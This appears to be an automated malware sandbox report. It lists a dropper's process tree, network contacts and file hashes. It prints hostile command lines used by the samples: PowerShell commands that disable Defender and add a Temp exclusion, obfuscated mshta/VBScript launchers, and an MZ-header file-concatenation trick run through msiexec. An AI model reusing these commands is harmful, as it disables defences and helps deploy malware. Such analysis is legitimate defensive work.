| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue192c34b1c2f5.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of UnmapMainImage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193e530416b51740a.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe
"C:\Users\Admin\AppData\Local\Temp\578a3a7a2b73a5c5f4a0485db0980b9acfa89b8e44690e799272d5cfb0237ab3.exe"
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19ac3c92c21.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19c9e031f4.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue1932df4dae.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue193e530416b51740a.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19c28f648204dbd4.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue1968b7ee9058232e8.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue196397c0f84f8.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue192c34b1c2f5.exe /mixone
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue197e9ec0ff0.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue193129b31e741ef3.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19cef5687a.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19d1fc7d2654d7a.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19cd42a7c874e44.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19b4b38a7569a9.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19f40f8518b9946.exe
C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue192c34b1c2f5.exe
Tue192c34b1c2f5.exe /mixone
C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue196397c0f84f8.exe
Tue196397c0f84f8.exe
C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19ac3c92c21.exe
Tue19ac3c92c21.exe
C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19c9e031f4.exe
Tue19c9e031f4.exe
C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue1968b7ee9058232e8.exe
Tue1968b7ee9058232e8.exe
C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19b4b38a7569a9.exe
Tue19b4b38a7569a9.exe
C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue197e9ec0ff0.exe
Tue197e9ec0ff0.exe
C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193e530416b51740a.exe
Tue193e530416b51740a.exe
C:\Users\Admin\AppData\Local\Temp\is-AKAG5.tmp\Tue196397c0f84f8.tmp
"C:\Users\Admin\AppData\Local\Temp\is-AKAG5.tmp\Tue196397c0f84f8.tmp" /SL5="$60228,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue196397c0f84f8.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2212 -ip 2212
C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue1932df4dae.exe
Tue1932df4dae.exe
C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19cd42a7c874e44.exe
Tue19cd42a7c874e44.exe
C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19cef5687a.exe
Tue19cef5687a.exe
C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19c28f648204dbd4.exe
Tue19c28f648204dbd4.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2212 -s 640
C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19f40f8518b9946.exe
Tue19f40f8518b9946.exe
C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193129b31e741ef3.exe
Tue193129b31e741ef3.exe
C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19d1fc7d2654d7a.exe
Tue19d1fc7d2654d7a.exe
C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193e530416b51740a.exe
C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue193e530416b51740a.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbscrIPt: CLOsE( crEATeObjEcT( "wsCRipt.SheLl" ). RUN ( "C:\Windows\system32\cmd.exe /q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue1932df4dae.exe"" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if """" == """" for %x In ( ""C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue1932df4dae.exe"" ) do taskkill -iM ""%~nXx"" /f " ,0 , TRuE ))
C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue196397c0f84f8.exe
"C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue196397c0f84f8.exe" /SILENT
C:\Users\Admin\AppData\Local\Temp\is-1NAED.tmp\Tue196397c0f84f8.tmp
"C:\Users\Admin\AppData\Local\Temp\is-1NAED.tmp\Tue196397c0f84f8.tmp" /SL5="$A006C,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue196397c0f84f8.exe" /SILENT
C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19f40f8518b9946.exe
C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19f40f8518b9946.exe
C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19d1fc7d2654d7a.exe
C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue19d1fc7d2654d7a.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /q /C tYPe "C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue1932df4dae.exe" > ~Xy1GPomKV09sC.Exe &&stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if "" == "" for %x In ("C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\Tue1932df4dae.exe") do taskkill -iM "%~nXx" /f
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 1668 -ip 1668
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1668 -s 12
C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe
~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1516 -ip 1516
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1516 -s 360
C:\Windows\SysWOW64\taskkill.exe
taskkill -iM "Tue1932df4dae.exe" /f
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbscrIPt: CLOsE( crEATeObjEcT( "wsCRipt.SheLl" ). RUN ( "C:\Windows\system32\cmd.exe /q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe"" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if ""-PyARgXd6fRp1GJRov7bdbpPssZBLJ "" == """" for %x In ( ""C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe"" ) do taskkill -iM ""%~nXx"" /f " ,0 , TRuE ))
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /q /C tYPe "C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe" > ~Xy1GPomKV09sC.Exe &&stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if "-PyARgXd6fRp1GJRov7bdbpPssZBLJ " == "" for %x In ("C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe") do taskkill -iM "%~nXx" /f
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBscrIpt: cLosE (cREatEObjEcT ( "wscript.sHeLl" ).Run ( "cMD.ExE /R ECHO | seT /P = ""MZ"" > F3U_R.J & CoPy /B /Y F3U_R.J+ RqC~~.A + TfSAy.w+ y5ULsw.L6+ AobbVRP.2Y + WvAi.2 BENCc.E & Start msiexec -Y .\bENCc.E " , 0 ,TruE ) )
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /R ECHO | seT /P = "MZ" >F3U_R.J & CoPy /B /Y F3U_R.J+ RqC~~.A + TfSAy.w+y5ULsw.L6+ AobbVRP.2Y + WvAi.2 BENCc.E &Start msiexec -Y .\bENCc.E
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" seT /P = "MZ" 1>F3U_R.J"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
C:\Windows\SysWOW64\msiexec.exe
msiexec -Y .\bENCc.E
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffc140ecc40,0x7ffc140ecc4c,0x7ffc140ecc58
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1924,i,11959674273810180748,18210956099547558234,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1920 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2152,i,11959674273810180748,18210956099547558234,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2120 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2236,i,11959674273810180748,18210956099547558234,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2204 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3076,i,11959674273810180748,18210956099547558234,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3096 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3120,i,11959674273810180748,18210956099547558234,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3240 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4524,i,11959674273810180748,18210956099547558234,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4484 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3684,i,11959674273810180748,18210956099547558234,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4720 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4716,i,11959674273810180748,18210956099547558234,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4540 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4988,i,11959674273810180748,18210956099547558234,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4976 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4660,i,11959674273810180748,18210956099547558234,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4364 /prefetch:8
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | marianu.xyz | udp |
| NL | 45.133.1.107:80 | tcp | |
| NL | 45.133.1.107:80 | tcp | |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 8.8.8.8:53 | www.listincode.com | udp |
| US | 54.205.158.59:443 | www.listincode.com | tcp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 8.8.8.8:53 | niemannbest.me | udp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | all-mobile-pa1ments.com.mx | udp |
| US | 8.8.8.8:53 | buy-fantasy-football.com.sg | udp |
| US | 8.8.8.8:53 | topniemannpickshop.cc | udp |
| US | 8.8.8.8:53 | 233.129.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | propanla.com | udp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | 46.3.26.104.in-addr.arpa | udp |
| US | 52.203.72.196:443 | www.listincode.com | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| FR | 91.121.67.60:2151 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | telegatt.top | udp |
| US | 8.8.8.8:53 | gcl-gb.biz | udp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.187.227:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | 227.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 8.8.8.8:53 | telegatt.top | udp |
| US | 8.8.8.8:53 | gcl-gb.biz | udp |
| NL | 45.9.20.13:80 | tcp | |
| US | 8.8.8.8:53 | www.iyiqian.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| SG | 13.251.16.150:80 | www.iyiqian.com | tcp |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 8.8.8.8:53 | 150.16.251.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | 42.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ogads-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| GB | 216.58.204.74:443 | ogads-pa.googleapis.com | tcp |
| GB | 216.58.201.110:443 | apis.google.com | tcp |
| GB | 216.58.204.74:443 | ogads-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | 74.204.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 110.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 172.217.16.238:443 | play.google.com | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| GB | 142.250.178.14:443 | clients2.google.com | tcp |
| US | 8.8.8.8:53 | 238.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | clients2.googleusercontent.com | udp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| GB | 216.58.213.1:443 | clients2.googleusercontent.com | tcp |
| US | 8.8.8.8:53 | telegatt.top | udp |
| US | 8.8.8.8:53 | 14.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.213.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | wfsdragon.ru | udp |
| US | 104.21.5.208:80 | wfsdragon.ru | tcp |
| US | 104.21.5.208:80 | wfsdragon.ru | tcp |
| FR | 51.178.186.149:80 | tcp | |
| FR | 51.178.186.149:80 | tcp | |
| US | 8.8.8.8:53 | 24.19.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 208.5.21.104.in-addr.arpa | udp |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | telegka.top | udp |
| US | 107.178.223.183:80 | telegka.top | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| FR | 91.121.67.60:2151 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| NL | 45.9.20.13:80 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 104.155.138.21:80 | telegka.top | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| N/A | 127.0.0.1:61901 | tcp | |
| N/A | 127.0.0.1:61907 | tcp | |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| NL | 45.9.20.13:80 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| FR | 91.121.67.60:2151 | tcp | |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 72.84.118.132:8080 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 107.178.223.183:80 | telegka.top | tcp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 8.8.8.8:53 | 99.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| NL | 45.9.20.13:80 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| FR | 91.121.67.60:2151 | tcp | |
| US | 8.8.8.8:53 | futurepreneurs.eu | udp |
| LT | 92.61.37.60:443 | futurepreneurs.eu | tcp |
| US | 8.8.8.8:53 | r11.o.lencr.org | udp |
| GB | 2.23.210.75:80 | r11.o.lencr.org | tcp |
| US | 8.8.8.8:53 | www.qxsgxd.com | udp |
| US | 8.8.8.8:53 | 60.37.61.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.169.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| FI | 135.181.129.119:4805 | tcp | |
| US | 104.155.138.21:80 | telegka.top | tcp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| NL | 45.9.20.13:80 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| FR | 91.121.67.60:2151 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 107.178.223.183:80 | telegka.top | tcp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 45.9.20.13:80 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| FI | 135.181.129.119:4805 | tcp | |
| US | 104.155.138.21:80 | telegka.top | tcp |
| FR | 91.121.67.60:2151 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | 170.117.168.52.in-addr.arpa | udp |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 45.9.20.13:80 | tcp | |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
Files
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
| MD5 | d0fbd06f5709db11a8b2449a1b919251 |
| SHA1 | 83f4610e15b613668b9ebad734dbc2f8fbefc614 |
| SHA256 | e94188908546b2f00a506d7596d3673b814ab62173967b3d258422877bc56f84 |
| SHA512 | c82970a78fba054ec6e9a962a43ca6fb94ddd3a0d744dd5b9d04a014f541e6da8038497c2ba15403df12600372cb624caf6e672eeac6915f680b062efeae1e8b |
C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\setup_install.exe
| MD5 | c10ba859e90df8a8d8e7dcc8dfe5ac20 |
| SHA1 | 92d43cc9db4e8e70d0eaf7f3406bad818f4a27c5 |
| SHA256 | 6c77a4d421de0321d74ec8d3fca02e782ac035ef471b1218471f139557e3a023 |
| SHA512 | 00fd1f5656cac70d0c769c8752d52a46f5ef3f93a10ee87f5e8ee63edd20e2d9c22cbf4f6123a835c701b432527821731e6bbc0b42b0fa5e41a52ca232d28d2a |
C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\libwinpthread-1.dll
| MD5 | 1e0d62c34ff2e649ebc5c372065732ee |
| SHA1 | fcfaa36ba456159b26140a43e80fbd7e9d9af2de |
| SHA256 | 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723 |
| SHA512 | 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61 |
C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\libcurlpp.dll
| MD5 | e6e578373c2e416289a8da55f1dc5e8e |
| SHA1 | b601a229b66ec3d19c2369b36216c6f6eb1c063e |
| SHA256 | 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f |
| SHA512 | 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89 |
C:\Users\Admin\AppData\Local\Temp\7zS443C1BA7\libcurl.dll
| MD5 | d09be1f47fd6b827c81a4812b4f7296f |
| SHA1 | 028ae3596c0790e6d7f9f2f3c8e9591527d267f7 |
| SHA256 | 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e |
